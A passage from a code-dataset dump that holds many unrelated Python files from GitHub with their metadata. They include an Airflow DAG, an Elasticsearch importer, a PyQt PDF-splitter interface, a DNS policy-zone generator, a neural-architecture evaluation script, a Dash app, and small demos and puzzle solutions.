return frac_ms; \n\ndef concat(a,b):\n return a+'_'+b\n\ndef CustomCmap(from_rgb,to_rgb):\n\n # from color r,g,b\n r1,g1,b1 = from_rgb\n\n # to color r,g,b\n r2,g2,b2 = to_rgb\n\n cdict = {'red': ((0, r1, r1),\n (1, r2, r2)),\n 'green': ((0, g1, g1),\n (1, g2, g2)),\n 'blue': ((0, b1, b1),\n (1, b2, b2))}\n\n cmap = LinearSegmentedColormap('custom_cmap', cdict)\n return cmap","repo_name":"matteocantiello/gwade","sub_path":"code/.ipynb_checkpoints/functions-checkpoint.py","file_name":"functions-checkpoint.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41877148415","text":"from urllib.parse import urlparse\nimport socket\nimport sys, getopt\n\ndef createZone(inp, out):\n out = open(out, 'w')\n out.write(\"$TTL 60s;\\n$ORIGIN ua.\\n@ SOA dns.ua. 
ung.utt.fr ( 1 20m 15m 1d 2h)\\n NS dns.ua.\\n\\n\")\n with open(inp) as f:\n lines = f.readlines()\n cpt = 0\n for line in lines:\n p = urlparse(line)\n h = p.hostname\n if h is not None:\n try:\n socket.inet_aton(h)\n except socket.error:\n cpt += 1\n out.write(\"%s CNAME .\\n\" % h)\n print(\"%d lines in zonefile.\" % cpt)\n out.close()\n\ndef printHelp():\n print('createRpz.py -i -o ')\n\ndef main(argv):\n inputfile = ''\n outputfile = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n printHelp()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n printHelp()\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n if inputfile == '' or outputfile == '':\n printHelp()\n else:\n createZone(inputfile, outputfile)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"ungdev/ua-lancache","sub_path":"dns/createRpz.py","file_name":"createRpz.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36987747922","text":"from airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime\n\n\ndag = DAG(\n 'fyp_workflow',\n description='FYP Workflow',\n schedule_interval='@monthly',\n start_date=datetime(2023, 6, 15),\n)\n\n# Define tasks\nstart_task = DummyOperator(task_id='start_task', dag=dag)\n\ntask1 = BashOperator(\n task_id='task1',\n bash_command='echo \"Executing task 1\"',\n dag=dag,\n)\n\ntask2 = BashOperator(\n task_id='task2',\n bash_command='echo \"Executing task 2\"',\n dag=dag,\n)\n\nend_task = DummyOperator(task_id='end_task', dag=dag)\n\nstart_task >> task1\nstart_task >> task2\ntask1 >> end_task\ntask2 >> end_task\n","repo_name":"narmeen-naqvi/MLOps-Project","sub_path":"fyp_workflow.py","file_name":"fyp_workflow.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9523652141","text":"import csv\nimport os\nimport datetime\nimport json\nimport glob\nimport requests\nimport elasticsearch as elas\nfrom bson import json_util\nimport Mongodb\nfrom elasticsearch.helpers import bulk\nimport time\nimport pandas as pd\n\n## connexion to elasticsearch\ndef connexion():\n print(datetime.datetime.now())\n return elas.Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\ndef create_index(es,index_name):\n print(datetime.datetime.now())\n if not es.indices.exists(index=index_name):\n es.indices.create(index=index_name)\n\ndef delete_index(es,index_name):\n es.indices.delete(index=index_name, ignore=[400, 404])\n\n##conversion csv to json\ndef csv_to_json(csvf,jsonf,fieldnames):\n csvfile = open(csvf, 'r')\n jsonfile = open(jsonf, 'w')\n reader = csv.DictReader(csvfile, fieldnames)\n n=False\n for row in reader:\n if n:\n json.dump(row, jsonfile)\n jsonfile.write('\\n')\n n=True\n\n\n## import all_sites to elasticsearch\ndef all_sites_to_es(es, index_name, docname,directory):\n print(datetime.datetime.now())\n csvfile = open(directory+'all_sites.csv', 'r')\n reader = csv.DictReader(csvfile)\n header = [\"SITE_ID\", \"INDUSTRY\", \"SUB_INDUSTRY\", \"SQ_FT\", \"LAT\", \"LNG\", \"TIME_ZONE\", \"TZ_OFFSET\"]\n\n for each in reader:\n row = {}\n L=[]\n for field in header:\n\n row[field] = each[field]\n\n es.index(index=index_name, doc_type=docname, 
body=row)\n es.indices.refresh(index=index_name)\n\n\n## import all_datas_sites to elasticsearch\ndef all_datas_sites_to_esv2(es,db,directory,index_name, docname):\n print(datetime.datetime.now())\n dbsite = db.enernoc.all_sites\n list_file = Mongodb.list_all_file(directory, \"csv\")\n actions = []\n for i in range(len(list_file)):\n print(list_file[i])\n data = pd.read_csv(list_file[i]).fillna('') ##lecture du csv\n filename = os.path.split(list_file[i])[1].replace('.csv', \"\")\n site_id = str(filename)\n site_add = Mongodb.site_id_to_id(dbsite, site_id)\n a = [site_add] * len(data)\n data['SITE'] = a\n geopoint=(str(data['SITE'][0]['LAT'])+\", \"+str(data['SITE'][0]['LNG'])) ## concatenation lat + lng pour mapping Kibana\n data['geo_point']=geopoint\n data['date'] = pd.to_datetime(data['timestamp'], unit='s')\n\n data_records = data.to_dict(orient='records') ##conversion pour format elasticsearch (dict)\n\n if not es.indices.exists(index_name):\n es.indices.create(index_name)\n\n print(\"Début import Elastic\")\n for i, r in enumerate(data_records):\n actions.append({\"_index\": index_name,\n \"_type\": docname,\n \"_source\": r})\n\n\n bulk(es, actions=actions, index=index_name, doc_type=docname, refresh=False) ## import dans elasticsearch via bulk\n es.indices.refresh(index=index_name)\n\n # helpers.parallel_bulk(client=es, actions=actions, thread_count=4, refresh=False)\n # es.indices.refresh(index=index_name)\n\n\n","repo_name":"wioui/bigdataproject","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24887253673","text":"from PyQt5.QtWidgets import QFileDialog\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom splitter_logic import *\n\nclass Ui_ReportSplitter(object):\n filename = \"\"\n directory = \"\"\n file_type = \"\"\n\n def set_report_type(self):\n self.file_type = \"mok\"\n self.listWidget.addItem(\"file type - \" + self.file_type)\n\n def set_mok_type(self):\n self.file_type = \"report\"\n self.listWidget.addItem(\"file type - \" + self.file_type)\n\n def getFileName(self):\n self.filename, check = QFileDialog.getOpenFileName(None,\n \"Choose File\",\n \".\",\n \"PDF Files(*.pdf)\")\n if check:\n self.listWidget.addItem(\"Filename - \" + self.filename)\n\n if self.directory == \"\":\n self.listWidget.addItem(\"Please select the output folder\")\n\n\n def getDirectory(self): # <-----\n self.directory = QFileDialog.getExistingDirectory(None, \"Choose Folder\", \".\")\n\n if self.directory:\n self.listWidget.addItem(\"Output folder - \" + self.directory)\n\n def split(self): # <-----\n if self.filename == \"\":\n self.listWidget.addItem(\"Please select the main report file\")\n return\n\n if self.directory == \"\":\n self.listWidget.addItem(\"Please select the output folder\")\n return\n\n if self.file_type == \"\":\n self.listWidget.addItem(\"Please set the file type\")\n return\n print(self.file_type)\n separate_all(self.filename, self.directory, self.listWidget, self.file_type)\n\n def setupUi(self, ReportSplitter):\n ReportSplitter.setObjectName(\"ReportSplitter\")\n ReportSplitter.setWindowModality(QtCore.Qt.WindowModal)\n ReportSplitter.resize(797, 600)\n ReportSplitter.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))\n ReportSplitter.setAutoFillBackground(False)\n ReportSplitter.setStyleSheet(\"font: 8pt \\\"Noto Sans Lisu\\\";\")\n ReportSplitter.setUnifiedTitleAndToolBarOnMac(False)\n self.centralwidget = 
QtWidgets.QWidget(ReportSplitter)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 220, 211, 261))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setSpacing(4)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.FileButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.FileButton.setStyleSheet(\"font: 75 8pt \\\"MS Shell Dlg 2\\\";\")\n self.FileButton.setObjectName(\"FileButton\")\n self.verticalLayout.addWidget(self.FileButton)\n self.FolderButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.FolderButton.setStyleSheet(\"font: 75 8pt \\\"MS Shell Dlg 2\\\";\")\n self.FolderButton.setObjectName(\"FolderButton\")\n self.verticalLayout.addWidget(self.FolderButton)\n self.SplitButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.SplitButton.setStyleSheet(\"font: 75 8pt \\\"MS Shell Dlg 2\\\";\")\n self.SplitButton.setObjectName(\"SplitButton\")\n self.verticalLayout.addWidget(self.SplitButton)\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(180, 0, 81, 681))\n self.line.setFrameShape(QtWidgets.QFrame.VLine)\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(10, 10, 181, 191))\n self.label.setText(\"\")\n self.label.setPixmap(QtGui.QPixmap(\"C:\\\\FirstApplicationTest\\\\UI\\\\images/bism3.bmp\"))\n self.label.setScaledContents(True)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setWordWrap(False)\n self.label.setIndent(-1)\n self.label.setObjectName(\"label\")\n self.listWidget = QtWidgets.QListWidget(self.centralwidget)\n self.listWidget.setGeometry(QtCore.QRect(235, 11, 541, 551))\n self.listWidget.setFrameShadow(QtWidgets.QFrame.Plain)\n self.listWidget.setObjectName(\"listWidget\")\n item = QtWidgets.QListWidgetItem()\n self.listWidget.addItem(item)\n self.horizontalLayoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 500, 211, 80))\n self.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.sample_1_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n self.sample_1_button.setObjectName(\"sample_1_button\")\n self.horizontalLayout.addWidget(self.sample_1_button)\n self.sample_2_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n self.sample_2_button.setObjectName(\"sample_2_button\")\n self.horizontalLayout.addWidget(self.sample_2_button)\n self.line_2 = QtWidgets.QFrame(self.centralwidget)\n self.line_2.setGeometry(QtCore.QRect(0, 470, 221, 16))\n self.line_2.setFrameShape(QtWidgets.QFrame.HLine)\n self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_2.setObjectName(\"line_2\")\n ReportSplitter.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(ReportSplitter)\n self.statusbar.setObjectName(\"statusbar\")\n ReportSplitter.setStatusBar(self.statusbar)\n self.FolderButton_2 = QtWidgets.QAction(ReportSplitter)\n self.FolderButton_2.setCheckable(False)\n 
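# --- Hedged aside: the splitter UI above hand-wires QFileDialog calls into
# slots. Here are the same two dialogs in isolation, as a runnable PyQt5
# sketch (function and variable names are illustrative, not from the repo):
import sys
from PyQt5.QtWidgets import QApplication, QFileDialog

def pick_pdf_and_folder():
    # getOpenFileName returns (path, selected_filter); both are '' on cancel
    filename, selected_filter = QFileDialog.getOpenFileName(
        None, "Choose File", ".", "PDF Files(*.pdf)")
    if not filename:
        return None, None
    directory = QFileDialog.getExistingDirectory(None, "Choose Folder", ".")
    return filename, directory or None

if __name__ == "__main__":
    app = QApplication(sys.argv)
    print(pick_pdf_and_folder())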
self.FolderButton_2.setObjectName(\"FolderButton_2\")\n\n self.FileButton.clicked.connect(self.getFileName)\n self.FolderButton.clicked.connect(self.getDirectory)\n self.SplitButton.clicked.connect(self.split)\n\n self.sample_1_button.clicked.connect(self.set_report_type)\n self.sample_2_button.clicked.connect(self.set_mok_type)\n\n self.retranslateUi(ReportSplitter)\n QtCore.QMetaObject.connectSlotsByName(ReportSplitter)\n\n def retranslateUi(self, ReportSplitter):\n _translate = QtCore.QCoreApplication.translate\n ReportSplitter.setWindowTitle(_translate(\"ReportSplitter\", \"Report Splitter\"))\n self.FileButton.setText(_translate(\"ReportSplitter\", \"Choose File\"))\n self.FolderButton.setText(_translate(\"ReportSplitter\", \"Choose Output Folder\"))\n self.SplitButton.setText(_translate(\"ReportSplitter\", \"Split\"))\n self.label.setToolTip(_translate(\"ReportSplitter\", \"
    \"))\n self.listWidget.setAccessibleDescription(_translate(\"ReportSplitter\", \"logs\"))\n __sortingEnabled = self.listWidget.isSortingEnabled()\n self.listWidget.setSortingEnabled(False)\n item = self.listWidget.item(0)\n item.setText(_translate(\"ReportSplitter\", \"Program started\\nPlease select the main file report(Press button: 'Choose File')\"))\n self.listWidget.setSortingEnabled(__sortingEnabled)\n\n self.sample_1_button.setText(_translate(\"ReportSplitter\", \"moks sample\"))\n self.sample_2_button.setText(_translate(\"ReportSplitter\", \"reports sample\"))\n self.FolderButton_2.setText(_translate(\"ReportSplitter\", \"Choose Folder\"))\n\n\n","repo_name":"VladislavYurev/BISM_Reports_Splitter","sub_path":"bism_app.py","file_name":"bism_app.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3339613749","text":"# asyncio, Hello World\nimport asyncio\n\n\n@asyncio.coroutine\ndef hello_world():\n while True:\n print(\"Hello World!\")\n yield from asyncio.sleep(1.0)\n\n\nif __name__ == '__main__':\n # отримуємо цикл обробки подій\n loop = asyncio.get_event_loop()\n loop.run_until_complete(hello_world())\n # закриваємо роботу з циклом подій\n loop.close()\n","repo_name":"Searge/DiveinPython","sub_path":"w_5/playground/asyncio_hw.py","file_name":"asyncio_hw.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"uk","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"10931955828","text":"from typing import Optional\n\nimport uvicorn\nfrom fastapi import FastAPI, Query, Request\n\napp = FastAPI()\n\n\n@app.get(\"/hello\")\ndef hello(request: Request, sleep_time: int = Query(None)):\n \"\"\"Can get query args not defined as params\"\"\"\n query_params = request.query_params.items()\n return query_params\n\n\n@app.get(\"/float\")\ndef float_func(float_p: Optional[float] = Query(None)):\n \"\"\"Can get query args not defined as params\"\"\"\n return float_p\n\n\n@app.get(\"/flag\")\ndef flag_func(f: Optional[str] = Query(None)):\n if f is not None:\n f = True\n else:\n f = False\n return f\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n","repo_name":"falkben/fastapi_experiments","sub_path":"experiments/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"9462887731","text":"import argparse\nimport os\n\nimport tensorflow as tf\nfrom tensorflow.keras import models\n\nimport log_service\nfrom dataset.generators.factory import dataset_generator_factory\nfrom models.generators.factory import model_generator_factory\nfrom search_space_units import CellSpecification\nfrom utils.config_utils import read_json_config\nfrom utils.nn_utils import predict_and_save_confusion_matrix, initialize_train_strategy, perform_global_memory_clear, \\\n remove_annoying_tensorflow_messages\nfrom utils.post_search_training_utils import MacroConfig, compile_post_search_model, save_evaluation_results\n\n# disable Tensorflow info and warning messages\nremove_annoying_tensorflow_messages()\n\nAUTOTUNE = tf.data.AUTOTUNE\n\n\ndef get_model_cell_spec(log_folder_path: str):\n with open(os.path.join(log_folder_path, 'cell_spec.txt'), 'r') as f:\n cell_spec = f.read()\n\n return CellSpecification.from_str(cell_spec)\n\n\n# This script can be used to evaluate the final model trained on a test set.\n# It needs 
a saved model, which could be the one found during search or the one produced by final_training script (spec + checkpoint)\ndef main():\n # if \"search_model\" flag is not specified, the script will assume that the final_training script has been executed to train extensively a model\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('-p', metavar='PATH', type=str, help=\"path to log folder\", required=True)\n parser.add_argument('-j', metavar='JSON_PATH', type=str,\n help='path to config json with training parameters (used to instantiate dataset)', default=None)\n parser.add_argument('--search_model', help='use best model found in search, with weights found on proxy training', action='store_true')\n parser.add_argument('-f', metavar='MODEL_FOLDER', type=str, help='model folder name (default: final_model_training)',\n default='final_model_training')\n parser.add_argument('-b', metavar='BATCH_SIZE', type=int, help='overrides the batch size used in configuration', default=None)\n parser.add_argument('-ts', metavar='TRAIN_STRATEGY', type=str, help='device used in Tensorflow distribute strategy', default=None)\n parser.add_argument('--top', help='when -f is provided, consider it as a nested folder if this option is set. Useful for example when evaluating'\n ' all models found during model selection step.', action='store_true')\n args = parser.parse_args()\n\n model_path = os.path.join(args.p, 'best_model') if args.search_model else os.path.join(args.p, args.f)\n log_service.set_log_path(model_path)\n\n if args.j:\n custom_json_path = args.j\n else:\n custom_json_path = os.path.join(args.p, 'restore', 'run.json') if args.search_model \\\n else os.path.join(model_path, 'run.json')\n\n print('Reading configuration...')\n config = read_json_config(custom_json_path)\n # override batch size if provided\n if args.b is not None:\n config.dataset.val_test_batch_size = args.b\n\n train_config = config.training_hyperparameters\n arc_config = config.architecture_hyperparameters\n multi_output = arc_config.multi_output\n\n train_strategy = initialize_train_strategy(args.ts, config.others.use_mixed_precision)\n\n # Load and prepare the dataset\n print('Preparing datasets...')\n dataset_generator = dataset_generator_factory(config.dataset, config.others)\n test_ds, classes_count, image_shape, test_batches = dataset_generator.generate_test_dataset()\n print('Datasets generated successfully')\n\n # Generate the model\n if args.search_model:\n with train_strategy.scope():\n model = models.load_model(os.path.join(args.p, 'best_model', 'tf_model'))\n print('Model loaded successfully from TF model files')\n save_evaluation_results(model, test_ds, model_path)\n\n # create confusion matrix only in classification tasks\n if config.dataset.type in ['image_classification', 'time_series_classification']:\n predict_and_save_confusion_matrix(model, test_ds, multi_output, n_classes=classes_count,\n save_path=os.path.join(model_path, 'test_confusion_matrix'))\n else:\n with train_strategy.scope():\n model_gen = model_generator_factory(config.dataset, train_config, arc_config, test_batches,\n output_classes_count=classes_count, input_shape=image_shape, data_augmentation_model=None)\n\n model_paths = [f.path for f in os.scandir(model_path) if f.is_dir()] if args.top else [model_path]\n for m_index, m_path in enumerate(model_paths):\n print(f'Processing model at \"{m_path}\"')\n\n cell_spec = get_model_cell_spec(m_path)\n print('Cell specification:')\n for i, block in enumerate(cell_spec):\n 
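                # block indices are shifted to 1-based purely for the log output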
print(f'Block {i + 1}: {block}')\n\n print('Generating Keras model from cell specification...')\n\n # read model configuration to extract its macro architecture parameters\n model_config = read_json_config(os.path.join(m_path, 'run.json'))\n macro = MacroConfig.from_config(model_config)\n\n with train_strategy.scope():\n model_gen.alter_macro_structure(*macro)\n mo_model, _ = model_gen.build_model(cell_spec, add_imagenet_stem=False)\n # add separate IoU in evaluation of segmentation models\n extra_metrics = [tf.keras.metrics.IoU(classes_count, target_class_ids=[i], ignore_class=255, sparse_y_pred=False)\n for i in range(classes_count)] if config.dataset.type == 'image_segmentation' else None\n model, _ = compile_post_search_model(mo_model, model_gen, train_strategy,\n enable_xla=config.others.enable_XLA_compilation, extra_metrics=extra_metrics)\n\n print('Model generated successfully')\n\n latest = tf.train.latest_checkpoint(os.path.join(m_path, 'weights'))\n model.load_weights(latest)\n print('Weights loaded successfully from checkpoint')\n\n save_evaluation_results(model, test_ds, m_path)\n # create confusion matrix only in classification tasks\n if config.dataset.type in ['image_classification', 'time_series_classification']:\n predict_and_save_confusion_matrix(model, test_ds, multi_output, n_classes=classes_count,\n save_path=os.path.join(m_path, 'test_confusion_matrix'))\n\n perform_global_memory_clear()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndreaFalanti/popnas","sub_path":"src/scripts/evaluate_network.py","file_name":"evaluate_network.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"18454113200","text":"from flask import Flask\nfrom flask_restful import Api,Resource,request\nfrom rsystem import return_r\n\napp = Flask(__name__)\napi = Api(app)\nclass Api(Resource):\n def get(self): \n arg = request.args.get(\"name\")\n print(arg, \"arg----------------\")\n data = return_r(movies=arg)\n print(data, \"data----------------\") \n return {\"data\": list(dict(data).keys())}\n\napi.add_resource(Api, \"/rmovies\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Vinaypatil-Ev/movie-recommender-system","sub_path":"rs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"353522933","text":"import random\nN = 300000\ns = 0\na = -3\nb = 3\nstep = (b-a)/N\nfor i in range(1, N+1):\n st = random.uniform(a, b)\n if st > 2 or st < -2: continue\n s += -1*(st)**2+4\ns *= (b-a)/N\nprint(s)","repo_name":"alekseik1/python_mipt_study","sub_path":"1sem/lesson_6/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74702382438","text":"import random\nfrom scipy.stats import norm\n\n\ndef instantiate_and_solve(constructor, semantle):\n solver = constructor()\n target, steps = solver.solve(semantle)\n return steps\n \n\ndef run_trial(nullary_constructor, semantle, n=10, target_pool=None, cartesian=False, tick=10):\n obs = []\n targets = []\n for i in range(n):\n all_targets = [semantle.target]\n if target_pool is not None:\n all_targets = [random.choice(target_pool)] if not cartesian else target_pool\n for t in all_targets:\n semantle.target = t\n steps = instantiate_and_solve(nullary_constructor, semantle)\n 
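            # keep obs and targets index-aligned: obs[k] is the number of solver
            # steps it took to reach targets[k]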
obs.append(steps)\n targets.append(t)\n if tick is not None and i % tick == 0:\n print('.', end='')\n return obs, targets\n \n \ndef run_sweep(unary_constructor, values, semantle, n=10, target_pool=None, cartesian=False):\n results = []\n for v in values:\n trial = run_trial(lambda: unary_constructor(v), semantle, n, target_pool, cartesian)\n results.append(trial)\n return results\n \n \ndef sweep_norm(results):\n mu_std = [norm.fit(trials) for trials in results]\n return list(zip(*mu_std))\n \n \ndef compare(a, b, semantle, n=20):\n norm_a = norm.fit(run_trial(a, semantle, n))\n norm_b = norm.fit(run_trial(b, semantle, n))\n return norm_a, norm_b\n \n \ndef delta(test, base, semantle, n=20):\n comparison = compare(test, base, semantle, n)\n return comparison[1][0] - comparison[0][0]","repo_name":"safetydave/semantic","sub_path":"src/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37303432704","text":"M1 = 10 ** 9 + 7\nM2 = 10 ** 9 + 33\np1 = 10 ** 9 + 9\np2 = 10 ** 9 + 87\npw1 = [1] * 10\npw2 = [1] * 10\nfor i in range(1, 10):\n pw1[i] = p1 * pw1[i - 1]\n pw2[i] = p2 * pw2[i - 1]\n pw1[i] %= M1\n pw2[i] %= M2\n\nclass Solution:\n def find(self, num, i, n, ctr, fhash, shash, tight, curr):\n if i >= n:\n if tight or ctr[0] > 0:\n return float('inf')\n for d in range(1, 10):\n if ctr[d] > 0 and ctr[d] != d:\n return float('inf')\n return curr\n key = (i, fhash, shash, tight)\n if key in self.cache:\n return self.cache[key]\n mindigit = 0\n if tight:\n mindigit = int(num[i])\n for d in range(mindigit, 10):\n if ctr[d] == d:\n continue\n ctr[d] += 1\n cres = self.find(num, i + 1, n, ctr, (fhash + d * pw1[d]) % M1, (shash + d * pw2[d]) % M2, tight and d == mindigit, 10 * curr + d)\n if cres < float('inf'):\n self.cache[key] = cres\n return cres\n ctr[d] -= 1\n self.cache[key] = float('inf')\n return float('inf')\n \n def nextBeautifulNumber(self, n: int) -> int:\n self.cache = {}\n a = self.find(str(n), 0, len(str(n)), [0] * 10, 0, 0, True, 0)\n self.cache = {}\n b = self.find(str(10 ** len(str(n))), 0, len(str(10 ** len(str(n)))), [0] * 10, 0, 0, True, 0)\n return min(a, b)","repo_name":"theabbie/leetcode","sub_path":"next-greater-numerically-balanced-number.py","file_name":"next-greater-numerically-balanced-number.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"16773304362","text":"\"\"\"Tabler.\"\"\"\n\n__title__ = \"tabler\"\n__description__ = \"Simple interface for tabulated data and .csv files\"\n__url__ = \"http://github.com/lukeshiner/tabler.git\"\n__version__ = \"2.5.0\"\n__author__ = \"Luke Shiner\"\n__author_email__ = \"luke@lukeshiner.com\"\n__license__ = \"MIT\"\n__copyright__ = \"Copyright 2018 Luke Shiner\"\n","repo_name":"lukeshiner/tabler","sub_path":"tabler/__version__.py","file_name":"__version__.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29921088163","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nBasic dash application to explore the errors of the Pix2Pix network depending on input and tide conditions.\n\nCreated on Tue Jun 14 13:18:31 2022\n\n@author: Aurelien Callens\n\"\"\"\nimport pickle\nimport bz2file as bz2\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\nfrom 
plotly.subplots import make_subplots\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash import Dash\nfrom dash.dependencies import Output, Input\n\ndef color_vec(df, i):\n vec = np.repeat('blue', len(df))\n vec[i] = 'red'\n return(vec)\n\ndata = bz2.BZ2File('df.pbz2', 'rb')\ndf = pickle.load(data)\n\napp = Dash(__name__)\nserver = app.server\n\napp.layout = html.Div([\n html.H1(children=\"Absolute error analysis\", style={'textAlign': 'center'}),\n html.Div([\n html.Div([\n dcc.Dropdown(id='bathy',\n options=[{'label': i, 'value': i} for i in df['bathy'].unique()],\n value='2017-03-27'),\n dcc.Slider(id='slider_i',\n value=0,\n min=0,\n tooltip={\"placement\": \"bottom\", \"always_visible\": True})\n ],style={'width': '60%', 'margin':'auto', 'justify-content': 'center'})\n ]),\n html.H3([html.P(id='metrics')], style=dict(display='flex', justifyContent='center')),\n html.Div(dcc.Graph(id='plotly'), style={'width': '100%', 'display': 'inline-block', 'align-items': 'center', 'justify-content': 'center'})\n ])\n\n@app.callback(\n Output('slider_i', component_property='max'),\n Input('bathy', 'value')\n)\ndef update_slider(bathy):\n dff = df[df['bathy'] == str(bathy)].reset_index()\n return len(dff)-1\n\n@app.callback(\n Output('plotly', 'figure'),\n Input('bathy', 'value'),\n Input('slider_i', 'value'),)\ndef update_graph(bathy, index):\n dff = df[df['bathy'] == str(bathy)].reset_index()\n\n i = int(index)\n\n fig = make_subplots(2, 3,\n subplot_titles=('Snap Input', 'Timex Input', 'Tide level', \n 'True Bathy', 'Pred. Bathy', 'Absolute error map'))\n\n _vmin, _vmax = np.min(dff['true'][i])-1, np.max(dff['true'][i])+1\n\n fig.add_trace(\n go.Heatmap(z=dff['input'][i][:,:,0], colorscale='gray', showscale=False), row=1, col=1)\n\n fig.add_trace(\n go.Heatmap(z=dff['input'][i][:,:,1], colorscale='gray', showscale=False), row=1, col=2)\n\n fig.add_trace(\n go.Scatter(mode='markers', x=dff['Date'], y=dff['Tide'], marker=dict(size=10, color=color_vec(dff,i))), row=1, col=3)\n\n fig.add_trace(\n go.Heatmap(z=dff['true'][i].squeeze(), colorscale='jet', colorbar=dict(x=0.29, y=0.2, len=.4), zmin=_vmin, zmax=_vmax), row=2, col=1)\n\n fig.add_trace(\n go.Heatmap(z=dff['pred'][i], colorscale='jet', colorbar=dict(x=0.645, y=0.2, len=.4) , zmin=_vmin, zmax=_vmax), row=2, col=2)\n\n fig.add_trace(\n go.Heatmap(z=dff['Err'][i], colorscale='inferno', colorbar=dict(x=1, y=0.2, len=.4)), row=2, col=3)\n fig.update_layout(plot_bgcolor = \"white\", transition_duration=10)\n fig.update_layout(autosize=True, height=1000)\n return fig\n\n\n\n@app.callback(\n Output('metrics', 'children'),\n Input('bathy', 'value'),\n Input('slider_i', 'value'),)\ndef update_metric(bathy, index):\n dff = df[df['bathy'] == str(bathy)].reset_index()\n\n i = int(index)\n\n sentence = 'RSME: {rmse:.2f}, MAE: {mae:.2f}'.format(rmse=dff['rmse'][i], mae=dff['mae'][i])\n return sentence\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"AurelienCallens/Dash_app_MAE","sub_path":"app_dash.py","file_name":"app_dash.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5755672296","text":"import cv2\nimport numpy as np\nimport os\nfrom datetime import datetime,timedelta\n\ncv2_maj_ver = cv2.__version__.split('.')[0]\nif cv2_maj_ver == '2':\n HISTCMPOPTION = cv2.cv.CV_COMP_BHATTACHARYYA\nelse:\n HISTCMPOPTION = cv2.HISTCMP_BHATTACHARYYA\n\n\nclass ShotChangeHist:\n def __init__(self,fps, 
